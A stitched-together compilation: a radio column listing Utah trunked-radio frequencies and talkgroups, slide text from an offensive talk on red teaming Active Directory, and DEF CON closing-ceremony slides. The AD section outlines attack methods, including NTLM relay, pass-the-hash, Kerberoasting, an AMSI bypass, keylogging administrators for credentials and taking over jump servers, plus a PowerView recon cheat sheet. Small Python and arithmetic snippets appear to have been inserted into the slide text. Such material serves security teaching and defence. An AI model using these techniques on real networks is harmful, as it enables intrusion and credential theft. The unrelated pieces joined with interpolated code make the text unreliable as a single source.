Salt Lake County (cell 3): 866.875, 867.150, 867.175, 867.400, 867.425, 867.6875, 867.725,
868.0875, 868.1125, 868.4125 and 868.5125 MHz.
Utah County (cell 4): 866.725, 866.975, 867.0875, 867.325, 867.375, 867.6625, 867.950,
868.0625, 868.3375 and 868.3625 MHz.
Reservoir Hill (cell 5): 866.0625, 866.3375, 866.6125, 867.1375 and 867.8625 MHz.
Promontory Point (cell 6): 866.2500, 866.5750, 866.7375, 868.3500 and 868.7000 MHz.
Mt. Ogden (cell 7): 866.1500, 866.1875, 866.4375, 866.5500, 866.7625, 866.8000 (data),
868.6250, 868.6500, 868.8750 and 868.9000 MHz.
Morgan Peak (cell 8): 866.1125, 866.3875 and 866.7125 MHz.
Francis Peak (cell 9): 866.4875, 866.2250, 868.6750 and 868.8250 MHz.
Layton (cell 10): 868.750, 868.775, 868.7875 and 868.800 MHz.
Nelson Peak (cell 11): 866.3750, 866.4000, 866.6500, 866.7000, 866.9000 and 868.5500 MHz.
Known UCAN talkgroups include — Aeromedical: 17184, 17216, 17248 and 17312
Davis County Fire: 9600, 9632, 9664, 10656, 10688, 10752, 10784, 10816, 10848, 10880 and
10912
Davis County Sheriff: 9312, 9376, 9408, 9728, 11776 and 11776
Orem Police Department: 44604, 44608 and 44672
Tooele County Sheriff: 40000 and 40032
Utah County Fire: 46240
Utah County Sheriff: 46112
Utah Highway Patrol: 9440, 19712 and 19744
Utah State Fire Air: 17184 and 17216
Wasatch County Sheriff: 47200, 47264
Weber County Sheriff: 6016 and 6048
Salt Lake County
UCAN is expected to fully interconnect with Salt Lake County's existing radio system, which is
a 800 MHz Motorola system spread across several repeater sites.
Frequencies: 854.5875, 854.7125, 855.4625, 856.2375, 856.7125, 856.9875, 857.2375,
857.4625, 857.7125, 857.9375, 858.2375, 858.4625, 858.7125, 859.2625, 859.4625, 859.7125,
859.7375, 860.2625, 860.7375, 866.0750, 866.3500, 866.6000, 866.6750, 866.8500, 867.2500,
867.7750, 868.0375, 868.4375 and 868.9375 MHz.
Salt Lake City fire talkgroups include 832, 864 and 896 while County fire uses 928, 960, 972,
976 and 992. Medical rescue talkgroups are 1408 and 1440.
Salt Lake City police use talkgroups 672, 704, 720, 736, 768 and 800. County Sheriff calls
appear on a number of talkgroups, including 240, 272, 304, 336, 432, and 416. SWAT and
Special Operations use 608 and 640.
Salt Lake City, Utah
Salt Lake City operates a Motorola Type I system. TrunkTracker listeners should use Fleetmap
E1 P3. Frequencies are 856.7625, 856.9625, 857.7625, 857.9625, 858.7625, 858.9625, 859.7625,
859.9625, 860.7625 and 860.9625 MHz.
Since UCAN, Salt Lake County and Salt Lake City all use Motorola 800 MHz trunked radio
systems, there is a proposal in the works to use a SmartZone OmniLink switch to tie them all
together. This would also allow Department of Justice and Department of the Treasury wireless
networks to be linked in.
Salt Lake City Airport
The Salt Lake City airport runs a Motorola Type II system using frequencies of 856.4875,
856.9875, 857.4625, 857.4875, 858.4875, 859.2375, 859.4875, 860.2375 and 860.4875 MHz.
Talkgroups 1200 and 1360 are used by the Salt Lake City Fire Department, while 528, 530, and
1136 are assigned to the airport medical rescue units. Airport Police are dispatched on talkgroups
592 and 1232 while Operations uses 848 and 880.
Latter-Day Saints Church
Salt Lake City may be best known as the headquarters of the Latter-Day Saints (LDS) Church,
better known as the Mormons. They operate their own Motorola trunked radio system using the
frequencies 855.2625, 855.3375, 855.5625, 856.8375, 857.8375, 858.8375, 859.8375 and
860.8375 MHz.
Orem, Utah
The city of Orem in Utah County is licensed to operate a Motorola Type II system on the
following frequencies: 866.2250, 866.4250, 866.4500, 866.6250, 866.8375, 866.8875, 867.0875,
867.1375, 867.2375, 867.2875, 867.4875, 867.5750, 867.7250, 867.8875, 867.9375, 868.2875,
868.4250, 868.6125, 868.6250 and 868.9000 MHz. Note that some of these frequencies overlap
with UCAN assignments. Could a Utah reader confirm that the Orem system has been absorbed
by UCAN?
Provo, Utah
The city of Provo, also in Utah County, has the following frequencies assigned for a Motorola
Type II system: 851.8125, 852.3875, 854.8875, 855.2625, 855.3375, 855.5375, 855.5625,
855.8125, 856.3875, 856.8625, 856.9125, 857.9125, 858.2125, 858.8875, 858.9125, 859.9375,
859.8875, 859.9125, 860.8875, 860.9125, 861.1375 and 865.1875 MHz. The system may also be
absorbed by UCAN.
Hill Air Force Base
Hill Air Force Base in Davis county operates their own Motorola Type II system in the 400 MHz
band. The system follows the UHF standard of 25 kHz steps and has a base frequency of 406.000
MHz. Actual frequencies in use are 406.150, 406.750, 407.250, 407.525, 408.025, 408.550,
408.950, 409.150, 409.750 and 406.2500 MHz.
The base fire department has been heard on talkgroup 10720 while flightline operations is on
9760.
Tooele, Utah
Perhaps reduced in size by now, the world's largest single stockpile of chemical weapons is
located 45 miles southwest of Salt Lake City in a town called Tooele (pronounced too-ELL-ah)
at the Army's Desert Chemical Depot. Since 1996 Tooele's mission has been to safely incinerate
the thousands of tons of U.S. chemical weapons.
The depot is reported to operate a five-channel Motorola Type II system on the following UHF
frequencies: 406.350, 407.150, 407.950, 408.750 and 409.550 MHz.
Computerized Talkgroup Logging
While scanning trunked frequencies, it is often a manual chore to write down each talkgroup that
appears on the scanner display. A MT reader just might have the solution for this problem.
Dan,
I am a MT subscriber and I enjoy reading your Tracking the Trunks section. I
have written a program for the Bearcat 245XLT and 780XLT scanners that
may be of interest to your readers. I am a programmer by profession but I
also write my own software as part of my radio hobby.
I originally wrote the program for my own use to collect new IDs for my web
page. I decided to release it as freeware so that others may get some use
from it. The software can be found at:
http://personal.lig.bellsouth.net/lig/k/d/kd5eis/IDTracker/IDTracker.htm
David, K5DMH
Baton Rouge, LA
David's software runs under Microsoft Windows and requires a serial connection to either a
Bearcat 245XLT or a 780XLT. Talkgroup IDs from Motorola or EDACS systems are displayed
and optionally logged to a disk file. His web page has comprehensive explanations of the
program's features and an easy-to-use download section.
That's all for this month. I welcome your electronic mail messages at dan @
signalharbor.com, and there is more information on my web site at
www.signalharbor.com. Until next time, happy monitoring!
Beyond the MCSE:
Red Teaming Active Directory
Sean Metcalf (@Pyrotek3)
s e a n @ adsecurity . org
www.ADSecurity.org
About Me
Founder Trimarc, a security company.
Microsoft MCM (AD) & MVP
Speaker:
BSides, Shakacon, Black Hat, DEF CON, DerbyCon
Security Consultant / Researcher
Own & Operate ADSecurity.org
(Microsoft platform security info)
| @PryoTek3 | sean @ adsecurity.org |
Agenda
Key AD Security components
Offensive PowerShell
Bypassing PowerShell security
Effective AD Recon
AD Defenses & Bypasses
Security Pro’s Checklist
| @PryoTek3 | sean @ adsecurity.org |
Hacking the System
PS> Get-FullAccess
| @PryoTek3 | sean @ adsecurity.org |
https://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-written-in-powershell-targets-organizations-via-microsoft-word/
| @PryoTek3 | sean @ adsecurity.org |
Differing Views of Active Directory
•Administrator
•Security Professional
•Attacker
Complete picture is not well understood by any single one of them
| @PryoTek3 | sean @ adsecurity.org |
AD Security in ~15 Minutes
| @PryoTek3 | sean @ adsecurity.org |
Forests & Domains
•Forest
•Single domain or collection of domains.
•Security boundary.
•Domain
•Replication & administrative policy
boundary.
| @PryoTek3 | sean @ adsecurity.org |
https://technet.microsoft.com/en-us/library/cc759073%28v=ws.10%29.aspx
| @PryoTek3 | sean @ adsecurity.org |
Trusts
• Connection between domains or forests to
extend authentication boundary (NTLM &
Kerberos v5).
• Exploit a trusted domain & jump the trust
to leverage access.
• Privilege escalation leveraging an exposed
trust password over Kerberos
(ADSecurity.org).
| @PryoTek3 | sean @ adsecurity.org |
Cloud Connectivity
•Corporate networks are connecting to
the cloud.
•Often extends corporate network into
cloud.
•Authentication support varies.
•Security posture often dependent on
cloud services.
| @PryoTek3 | sean @ adsecurity.org |
Sites & Subnets
• Map AD to physical locations for replication.
• Subnet-Site association for resource
discovery.
• Asset discovery:
• Domain Controllers
• Exchange Servers
• SCCM
• DFS shares
| @PryoTek3 | sean @ adsecurity.org |
Domain Controllers
•Member server -> DC via DCPromo
•FSMOs – single master roles.
•Global Catalog: forest-wide queries.
•Extraneous services = potential
compromise.
| @PryoTek3 | sean @ adsecurity.org |
Read-Only Domain Controllers
•Read-only DC, DNS, SYSVOL
•RODC Admin delegation to non DAs
•No passwords cached (default)
•KRBTGT cryptographically isolated
•RODC escalation via delegation
•msDS-AuthenticatedToAccountList
| @PryoTek3 | sean @ adsecurity.org |
DC Discovery (DNS)
| @PryoTek3 | sean @ adsecurity.org |
DC Discovery (ADSI)
| @PryoTek3 | sean @ adsecurity.org |
Group Policy
•User & computer management
•Create GPO & link to OU
•Comprised of:
• Group Policy Object (GPO) in AD
• Group Policy Template (GPT) files in
SYSVOL
• Group Policy Client Side Extensions on
clients
•Modify GPO or GPT…
| @PryoTek3 | sean @ adsecurity.org |
Group Policy Capability
•Configure security settings.
•Add local Administrators.
•Add update services.
•Deploy scheduled tasks.
•Install software.
•Run user logon/logoff scripts.
•Run computer startup/shutdown scripts.
| @PryoTek3 | sean @ adsecurity.org |
NTLM Authentication
| @PryoTek3 | sean @ adsecurity.org |
NTLM Authentication
• Most aren’t restricting NTLM auth.
• Still using NTLMv1!
• NTLM Attacks:
• SMB Relay - simulate SMB server or relay to
attacker system.
• Intranet HTTP NTLM auth – Relay to Rogue
Server
• NBNS/LLMNR – respond to NetBIOS broadcasts
• HTTP -> SMB NTLM Relay
• WPAD (network proxy)
• ZackAttack
• Pass the Hash (PtH)
| @PryoTek3 | sean @ adsecurity.org |
Kerberos Authentication
| @PryoTek3 | sean @ adsecurity.org |
Kerberos Key Points
• NTLM password hash for Kerberos RC4 encryption.
• Logon Ticket (TGT) provides user auth to DC.
• Kerberos policy only checked when TGT is created.
• DC validates user account when TGT > 20 mins.
• Service Ticket (TGS) PAC validation optional & rare.
• Server LSASS sends PAC Validation request to
DC's netlogon service (NRPC).
• If it runs as a service, PAC validation is optional
(disabled)
• If a service runs as System, it performs server
signature verification on the PAC (computer LTK).
| @PryoTek3 | sean @ adsecurity.org |
PowerShell
as an
Attack
Platform
| @PryoTek3 | sean @ adsecurity.org |
Quick PowerShell Attack History
• Summer 2010 - DEF CON 18: Dave Kennedy & Josh
Kelly “PowerShell OMFG!”
https://www.youtube.com/watch?v=JKlVONfD53w
• Describes many of the PowerShell attack techniques
used today (Bypass exec policy, -Enc, & IE).
• Released PowerDump to dump SAM database via
PowerShell.
• 2012 – PowerSploit, a GitHub repo started by
Matt Graeber, launched with Invoke-
Shellcode.
• “Inject shellcode into the process ID of your choosing or
within the context of the running PowerShell process.”
• 2013 - Invoke-Mimikatz released by Joe Bialek
which leverages Invoke-ReflectivePEInjection.
| @PryoTek3 | sean @ adsecurity.org |
PowerShell v5 Security Enhancements
•Script block logging
•System-wide transcripts (w/ invocation
header)
•Constrained PowerShell enforced with
AppLocker
•Antimalware Integration (Win 10)
http://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-the-blue-team.aspx
| @PryoTek3 | sean @ adsecurity.org |
| @PryoTek3 | sean @ adsecurity.org |
Windows 10: AntiMalware Scan Interface (AMSI)
| @PryoTek3 | sean @ adsecurity.org |
Bypassing Windows 10 AMSI
• DLL hijacking:
http://cn33liz.blogspot.nl/2016/05/bypassing-amsi-
using-powershell-5-dll.html
• Use Reflection:
| @PryoTek3 | sean @ adsecurity.org |
Metasploit PowerShell Module
| @PryoTek3 | sean @ adsecurity.org |
PS Constrained Language Mode?
| @PryoTek3 | sean @ adsecurity.org |
PowerShell v5 Security Log Data?
| @PryoTek3 | sean @ adsecurity.org |
Effective AD Recon
Gaining better target knowledge than the Admins…
| @PryoTek3 | sean @ adsecurity.org |
PowerShell for AD Recon
•MS Active Directory PowerShell module
•Quest AD PowerShell module
•Custom ADSI PowerShell queries
•PowerView – Will Harmjoy (@harmj0y)
| @PryoTek3 | sean @ adsecurity.org |
Active Directory Forest Info
| @PryoTek3 | sean @ adsecurity.org |
Active Directory Domain Info
| @PryoTek3 | sean @ adsecurity.org |
Forest & Domain Trusts
| @PryoTek3 | sean @ adsecurity.org |
Digging for Gold in AD
•Default/Weak passwords
•Passwords stored in user attributes
•Sensitive data
•Incorrectly secured data
•Extension Attribute data
•Deleted Objects
| @PryoTek3 | sean @ adsecurity.org |
Discovering Data
•Invoke-UserHunter:
• User home directory servers & shares
• User profile path servers & shares
• Logon script paths
•Performs Get-NetSession against each.
•Discovering DFS shares
•Admin hunting… follow Will Harmjoy’s
work: blog.harmj0y.net
| @PryoTek3 | sean @ adsecurity.org |
Useful AD User Properties
• Created
• Modified
• CanonicalName
• Enabled
• Description
• LastLogonDate
• DisplayName
• AdminCount
• SIDHistory
• PasswordLastSet
• PasswordNeverExpires
• PasswordNotRequired
• PasswordExpired
• SmartcardLogonRequired
• AccountExpirationDate
• LastBadPasswordAttempt
• msExchHomeServerName
• CustomAttribute1 - 50
• ServicePrincipalName
| @PryoTek3 | sean @ adsecurity.org |
Useful AD Computer Properties
• Created
• Modified
• Enabled
• Description
• LastLogonDate
(Reboot)
• PrimaryGroupID
(516 = DC)
• PasswordLastSet
(Active/Inactive)
• CanonicalName
• OperatingSystem
• OperatingSystemServicePack
• OperatingSystemVersion
• ServicePrincipalName
• TrustedForDelegation
• TrustedToAuthForDelegation
| @PryoTek3 | sean @ adsecurity.org |
Fun with User Attributes: SID History
• SID History attribute supports migration
scenarios.
• Security principals have SIDs determine
permissions & resources access.
• Enables access for one account to effectively
be cloned to another.
• Works for SIDs in the same domain as well as
across domains in the same forest.
| @PryoTek3 | sean @ adsecurity.org |
DNS via LDAP
| @PryoTek3 | sean @ adsecurity.org |
Discover Computers & Services without
Port Scanning aka “SPN Scanning”
| @PryoTek3 | sean @ adsecurity.org |
Discover Enterprise Services without Port Scanning
• SQL servers, instances, ports, etc.
• MSSQLSvc/adsmsSQL01.adsecurity.org:1433
• RDP
• TERMSERV/adsmsEXCAS01.adsecurity.org
• WSMan/WinRM/PS Remoting
• WSMAN/adsmsEXCAS01.adsecurity.org
• Forefront Identity Manager
• FIMService/adsmsFIM01.adsecurity.org
• Exchange Client Access Servers
• exchangeMDB/adsmsEXCAS01.adsecurity.org
• Microsoft SCCM
• CmRcService/adsmsSCCM01.adsecurity.org
| @PryoTek3 | sean @ adsecurity.org |
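Those SPN strings all follow the same serviceclass/host(:port) shape, so harvesting targets from an LDAP dump is a few lines of string handling. A minimal Python sketch — `parse_spn` is our own illustration, not part of PowerView or any Microsoft tooling:

```python
# Split SPNs of the form serviceclass/host:port[/servicename] into their parts.
def parse_spn(spn):
    service_class, _, rest = spn.partition("/")
    instance = rest.split("/", 1)[0]            # drop any trailing servicename
    host, _, port = instance.partition(":")
    return service_class, host, int(port) if port.isdigit() else None

for spn in ("MSSQLSvc/adsmsSQL01.adsecurity.org:1433",
            "TERMSERV/adsmsEXCAS01.adsecurity.org"):
    print(parse_spn(spn))
```

Note the `isdigit()` guard: the part after the colon can also be a named SQL instance rather than a numeric port.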
SPN Scanning
SPN Directory:
http://adsecurity.org/?page_id=183
| @PryoTek3 | sean @ adsecurity.org |
Cracking Service Account Passwords
(Kerberoast)
Request/Save TGS service tickets & crack offline.
“Kerberoast” python-based TGS password cracker.
No elevated rights required.
No traffic sent to target.
https://github.com/nidem/kerberoast
| @PryoTek3 | sean @ adsecurity.org |
Discover Admin Accounts: Group Enumeration
| @PryoTek3 | sean @ adsecurity.org |
Discover Admin Accounts – RODC Groups
| @PryoTek3 | sean @ adsecurity.org |
Discover Admin Accounts –
AdminCount = 1
| @PryoTek3 | sean @ adsecurity.org |
Discover AD Groups with Local Admin Rights
| @PryoTek3 | sean @ adsecurity.org |
Discover AD Groups with Local
Admin Rights
| @PryoTek3 | sean @ adsecurity.org |
Attack of the Machines:
Computers with Admin Rights
| @PryoTek3 | sean @ adsecurity.org |
Discover Users with Admin Rights
| @PryoTek3 | sean @ adsecurity.org |
Discover Virtual Admins
| @PryoTek3 | sean @ adsecurity.org |
Follow the Delegation…
| @PryoTek3 | sean @ adsecurity.org |
Follow the Delegation…
| @PryoTek3 | sean @ adsecurity.org |
Discover Admin Accounts: Group Policy
Preferences
\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
| @PryoTek3 | sean @ adsecurity.org |
Identify Partner Organizations via Contacts
| @PryoTek3 | sean @ adsecurity.org |
Identify Partner Organizations via Contacts
| @PryoTek3 | sean @ adsecurity.org |
Identify Domain Password Policies
| @PryoTek3 | sean @ adsecurity.org |
Identify Fine-Grained Password Policies
| @PryoTek3 | sean @ adsecurity.org |
Group Policy Discovery
| @PryoTek3 | sean @ adsecurity.org |
Identify AppLocker Whitelisting Settings
| @PryoTek3 | sean @ adsecurity.org |
Identify Microsoft EMET Configuration
| @PryoTek3 | sean @ adsecurity.org |
Identify Microsoft LAPS Delegation
| @PryoTek3 | sean @ adsecurity.org |
Identify Microsoft LAPS Delegation
| @PryoTek3 | sean @ adsecurity.org |
AD Defenses & Bypasses
| @PryoTek3 | sean @ adsecurity.org |
HoneyTokens, HoneyCredentials…
•Credentials injected into memory.
•Deployment method?
•May or may not be real on the network.
•Validate account data with AD.
•Avoid these.
| @PryoTek3 | sean @ adsecurity.org |
Randomized Local Admin PW (LAPS)
•PowerUp to local admin rights.
•Dump service credentials.
•Leverage credentials to escalate
privileges.
•Find AD accounts with LAPS password
view rights.
•Find secondary admin account not
managed by LAPS.
| @PryoTek3 | sean @ adsecurity.org |
Network Segmentation
•“High Value Targets” isolated on the
network.
•Admin systems on separate segments.
•Find admin accounts for these systems &
where they logon.
•Compromise patching system to gain
access. (see PowerSCCM in PowerSploit).
| @PryoTek3 | sean @ adsecurity.org |
No Domain Admins
•Check domain “Administrators”
membership.
•Look for custom delegation:
•“Tier” or “Level”
•Workstation/Server Admins
•Somebody has rights!
| @PryoTek3 | sean @ adsecurity.org |
Privileged Admin Workstation (PAW)
• Active Directory Admins only logon to PAWs.
• Should have limited/secured communication.
• Should be in their own OU.
• May be in another forest (Red/Admin Forest).
• Compromise install media or patching system.
• Compromise in/out comms.
| @PryoTek3 | sean @ adsecurity.org |
Jump (Admin) Servers
• If Admins are not using Admin workstations,
keylog for creds on admin’s workstation.
• Discover all potential remoting services.
• RDP
• WMI
• WinRM/PowerShell Remoting
• PSExec
• NamedPipe
• Compromise a Jump Server, 0wn the
domain!
| @PryoTek3 | sean @ adsecurity.org |
AD Admin Tiers
| @PryoTek3 | sean @ adsecurity.org |
https://technet.microsoft.com/en-us/library/mt631193.aspx
AD Admin Tiers
| @PryoTek3 | sean @ adsecurity.org |
https://technet.microsoft.com/en-us/library/mt631193.aspx
ESAE Admin Forest (aka “Red Forest”)
| @PryoTek3 | sean @ adsecurity.org |
https://technet.microsoft.com/en-us/library/mt631193.aspx#ESAE_BM
ESAE Admin Forest (aka “Red Forest”)
• The “best” way to secure & protect AD.
• Separate forest with one-way forest trust.
• Separate smart card PKI system.
• Separate updating & patching system.
• All administration performed w/ ESAE
accounts & ESAE computers.
• Completely isolated.
| @PryoTek3 | sean @ adsecurity.org |
Universal Bypass for Most Defenses
•Service Accounts
•Over-permissioned
•Not protected like Admins
•Weak passwords
•No 2FA/MFA
•Limited visibility/understanding
| @PryoTek3 | sean @ adsecurity.org |
Interesting AD Facts
•All Authenticated Users have read
access to:
• Most (all) objects & their attributes in AD
(even across trusts!).
• Most (all) contents in the domain share
“SYSVOL” which can contain interesting
scripts & files.
| @PryoTek3 | sean @ adsecurity.org |
Interesting AD Facts:
•Standard user account…
• Elevated rights through “SID History”
without being a member of any
groups.
• Ability to modify users/groups without
elevated rights w/ custom OU ACLs.
• Modify rights to an OU or domain-
linked GPO, compromise domain.
| @PryoTek3 | sean @ adsecurity.org |
A Security Pro’s AD Checklist
• Identify who has AD admin rights (domain/forest).
• Identify DC logon rights.
• Identify virtual host admins (virtual DCs).
• Scan Active Directory Domains, OUs,
AdminSDHolder, & GPOs for inappropriate custom
permissions.
• Ensure AD admins protect their credentials by not
logging into untrusted systems (workstations).
• Limit service account rights that are currently DA (or
equivalent).
| @PryoTek3 | sean @ adsecurity.org |
PowerView AD Recon Cheat Sheet
• Get-NetForest
• Get-NetDomain
• Get-NetForestTrust
• Get-NetDomainTrust
• Invoke-MapDomainTrust
• Get-NetDomainController
• Get-DomainPolicy
• Get-NetGroup
• Get-NetGroupMember
• Get-NetGPO
• Get-NetGPOGroup
• Get-NetUser
• Invoke-ACLScanner
| @PryoTek3 | sean @ adsecurity.org |
Summary
•AD stores the history of an organization.
•Ask the right questions to know more
than the admins.
•Quickly recon AD in hours (or less)
•Business requirements subvert security.
•Identify proper leverage and apply.
| @PryoTek3 | sean @ adsecurity.org |
Questions?
Sean Metcalf (@Pyrotek3)
s e a n @ adsecurity . org
www.ADSecurity.org
Slides: Presentations.ADSecurity.org
| @PryoTek3 | sean @ adsecurity.org |
References
• PowerShell Empire
http://PowerShellEmpire.com
• Active Directory Reading Library
https://adsecurity.org/?page_id=41
• Read-Only Domain Controller (RODC) Information
https://adsecurity.org/?p=274
• DEF CON 18: Dave Kennedy & Josh Kelly “PowerShell OMFG!”
https://www.youtube.com/watch?v=JKlVONfD53w
• PowerShell v5 Security Enhancements
http://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-
the-blue-team.aspx
• Detecting Offensive PowerShell Attack Tools
https://adsecurity.org/?p=2604
• Active Directory Recon Without Admin Rights
https://adsecurity.org/?p=2535
| @PryoTek3 | sean @ adsecurity.org |
References
• Mining Active Directory Service Principal Names
http://adsecurity.org/?p=230
• SPN Directory:
http://adsecurity.org/?page_id=183
• PowerView GitHub Repo (PowerSploit)
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
• Will Schroeder (@harmj0y): I have the PowerView (Offensive Active Directory
PowerShell) Presentation
http://www.slideshare.net/harmj0y/i-have-the-powerview
• MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of
Privilege
http://adsecurity.org/?tag=ms14068
• Microsoft Enhanced security patch KB2871997
http://adsecurity.org/?p=559
• Tim Medin’s DerbyCon 2014 presentation: “Attacking Microsoft Kerberos: Kicking
the Guard Dog of Hades”
https://www.youtube.com/watch?v=PUyhlN-E5MU
• Microsoft: Securing Privileged Access Reference Material
https://technet.microsoft.com/en-us/library/mt631193.aspx
• TechEd North America 2014 Presentation: TWC: Pass-the-Hash and Credential
Theft Mitigation Architectures (DCIM-B213) Speakers: Nicholas DiCola, Mark
Simos http://channel9.msdn.com/Events/TechEd/NorthAmerica/2014/DCIM-B213
| @PryoTek3 | sean @ adsecurity.org |
References
• Mimikatz
https://adsecurity.org/?page_id=1821
• Attack Methods for Gaining Domain Admin Rights in Active
Directory
https://adsecurity.org/?p=2362
• Microsoft Local Administrator Password Solution (LAPS)
https://adsecurity.org/?p=1790
• The Most Common Active Directory Security Issues and What
You Can Do to Fix Them
https://adsecurity.org/?p=1684
• How Attackers Dump Active Directory Database Credentials
https://adsecurity.org/?p=2398
• Sneaky Active Directory Persistence Tricks
https://adsecurity.org/?p=1929
| @PryoTek3 | sean @ adsecurity.org |
Detecting/Mitigating PS>Attack
• Discover PowerShell in non-standard processes.
• Get-Process modules like
“*Management.Automation*”
| @PryoTek3 | sean @ adsecurity.org |
Detecting EXEs Hosting PowerShell
•Event 800: HostApplication not standard
Microsoft tool
•Event 800: Version mismatch between
HostVersion & EngineVersion (maybe).
•System.Management.Automation.dll hosted
in non-standard processes.
•EXEs can natively call .Net & Windows APIs
directly without PowerShell.
| @PryoTek3 | sean @ adsecurity.org |
Closing Ceremonies
25th Anniversary
Badges Badges Badges!
And…is that the line for Swag?!
#badgelife
Swag!
Sold out again!
Thank you from Swag to Speaker Goons!
Transparency
• More information about DEF CON departments and what's going on.
Thanks to all DEF CON Goons
• Administration
• A & E
• Artwork
• Badges
• Contests/Events
• Demo Labs
• Dispatch
• DC Groups
• Forums
• Info/HackerTracker
• Inhuman Reg
• Operations
• NOC / DCTV
• Press
• Production
• QM
• Registration
• Review Board
• SOC
• Social Media
• Speaker Ops
• Swag
• Vendors
• Workshops
Old and New Goons – Thank You!
New, retiring Gold Badge Holders
Gold Badge Holders of the past
New Goons – n00ns
Hacker Tracker App
Android and iOS
Source available on GitHub - https://goo.gl/bbVRMt
Created by @shortstack and @sethlaw
Developed by @ChrisMays94 @MaceraMeg
Designed by @iMacHumphries
Network Operations
Wired Infrastructure
– Closed Captioning
– Contests
– DC TV
– Goons
– Media Server
– Press
– Rootz
– Richard Cheese
– SOMA FM
– Speaker Ops
– Speakers
– Vendors
– Villages
– WiFi Monitoring
Wireless Infrastructure
for the brave (and patched devices)
DC TV
for those people in their rooms
The Network
• 10 gbps backbone
• 200/250 mbps internet uplink
• Wired
– Firewall - FreeBSD
– 1 x Core Cisco Switch (#yolo, but we had a cold stand-by box)
– 14 x Edge Cisco Switches
– 3 x Monitoring ”Servers”
– 2 x DC TV ”Servers”
– 1 x WiFi Registration ”Server”
– 1 x Admin ”Server”
– Media Server
The Network (cont)
• Wireless
– 7210 Aruba Controller
– 61 Aruba Access Points (70, 105, 135, 225)
– 69 Aruba Access Points (model 305) – THANKS Aruba!
• DCTV
– 13 ODROID units
– 2 x on-site streaming servers
– Video Transcoding provided by SOK
The Network (cont)
DC TV
– HD Broadcast
– 2 Tracks streamed to the internetz
– 5 channels at Caesars
– 4 channels for each remote property
Timeline
Sunday
NOC Setup
WiFi APs hanging/patching
DC TV server installs
DC TV oDroids configuration
dctv.defcon.org up
wifireg.defcon.org up
Tuesday
Wednesday
Site-Site VPN to Paris/Ballys
Remote oDroid Installs
Network Management Systems
Network Monitoring
Lots of walking
APs install done
patching patching
DC TV ready to go (not all hotel towers/properties though)
patching patching mushroom mushroom
DONE! (record for the NOC, but then last minute requests)
Decent team dinner
Firewall
Aruba Controller
MDF/IDF connections
Internet UPLINK
Monday
Lots of Planning
Less planning than it should have been
We did slightly better on planning this year
Pre-staging Wired & Wireless Gear
Post-Con 2016/2017
Timeline (cont)
Friday
DC TV stuffz
Sunday
Monday
Teardown
Start Packing
Beer
Packing
Leaving Las Vegas
Just worked (despite the issues)
Saturday
Last Minute Requests (new patches, cables, switches)
Thursday
Issues
• Bandwidth
• AP Coverage / AP Capacity at times
• DC TV
– ODROIDS
– Remote Location Setup
– Flood at Paris
– switched from rtsp to rtmp
WiFi Stuff
• 802.1x misconceptions
• Twitter trollage
The Usual Stats
• 4.886 TB of internet traffic
– Inbound: 3.688 (compared to 3.13487072983 from DC24)
– Outbound: 1.198 (compared to 1.1607473418 from DC24)
• 5,455 users registered on wifireg (~4k last year)
• 2,104 wireless users peak (compared to 1400)
• 22k unique DHCP leases (compared to 35k, thanks!)
• 8,226 ”unique” mac addresses
• 6.74 TB of wireless traffic
• 1.89 TB media server traffic
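The headline traffic number is just the sum of the per-direction figures, and the DC24 comparison gives a growth rate; a quick arithmetic check (all numbers from the slide above):

```python
# Sanity arithmetic on the NOC traffic stats quoted above
inbound_tb, outbound_tb = 3.688, 1.198
print(round(inbound_tb + outbound_tb, 3))      # 4.886 TB total, as reported

# year-over-year inbound growth vs. the DC24 figure on the same slide
growth = (inbound_tb / 3.13487072983 - 1) * 100
print(f"inbound up ~{growth:.0f}% over DC24")
```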
effffn’s(twelve(
• Leads'
– effffn(
– mac(
• Infra/'Systems'
– #sparky((The(Machine)(
– booger(
– c0mmiebstrd(
– c7five(
– deadicaCon(
• DC'TV'
– videoman(
– serif(
• WiFi'
– CRV(
– Jon2(
• n00b'
– musa(
THANKS!
• DT
• Charel
• Will
• Caesars IT Staff
• Encore Staff
• Source of Knowledge
• The nice folks who always bring us snacks!
• Press Goons
• Capitan Obvious
• Micah (for nothing, #1 Genius Bar Employee <3)
• The Machine
• YOU!
http://defconnetworking.org
@DEFCON_NOC
noc\at/defconnetworking.org
Fundraising at DEF CON
• HFC $100 (reverse engineering challenge)
• EFF - $95,000+
• With small donations included from:
• - Beard and mustache
• - Badge hacking
• Darknet - $3,900 for EFF
• Rapid7 - $4,000 for EFF
• Hack fortress - $159 for EFF
• Mohawkcon:
• $5,100 donations:
• 158 heads $4,600,
• EFF: $3,100
• HFC: $1,300
• Sticker bot: $105 (den hac)
• Mohawk swag: $500
Villages at DEF CON
BioHacking Village
SE Village
Car Hacking Village
Crypto and Privacy Village
Data Duplication Village
Hardware Hacking Village (10th Anniversary)
ICS Village
IoT Village
Lockpick Village
Packet Hacking Village
Recon Village
Tamper Evident Village
Wireless Village
Voting Machine Village
Data Duplication Village
Sources (6TB each)
• Infocon.org
• Hashtables
• More hashtables
Drive Types
• Seagate – 150 and <6% fail
• Western Digital – 147 <1% fail
• Toshiba – 109 <1%
• HGST – 85 <18% (in talks w/them)
• Mediamax – 7 <43% (huhwhat?)
Output (more info at dcddv.org)
• Dupe time was: 7h50m to 16h22m per drive
• Infocon: 229 copies
• Hashtables 1-2: 95 copies
• Hashtable 2-2: 96 copies
• Total dupes: 420 copies (lols)
• 420 dupes @ 6TB each = 2.5 PB Out!
• 120MB/sec Average
• 95 duplicators for 60 straight hours
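The duplication figures above are internally consistent, which is easy to confirm with back-of-envelope arithmetic (numbers taken from the slide; decimal terabytes assumed):

```python
# 420 copies of a 6 TB drive, and the per-drive time at the quoted average rate
copies, drive_tb = 420, 6
print(copies * drive_tb / 1000)        # 2.52 PB out the door, matching "2.5 PB Out!"

hours = drive_tb * 1e12 / 120e6 / 3600 # 6 TB at 120 MB/s
print(round(hours, 1))                 # ~13.9 hours, inside the 7h50m-16h22m range
```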
Events at DEF CON
Friends of Bill W.
Be the Match
Cycleoverride DEF CON Ride
DEAF CON
DEF CON Groups Parties
DEF CON Labs
DEF CON Shoot
Hacker Jeopardy
Hacker Karaoke
Ham Radio Exams
Lawyer Meetup
Mohawk-Con
Movie Night
Queercon
SE Podcast Live
Skytalks
Contests at DEF CON
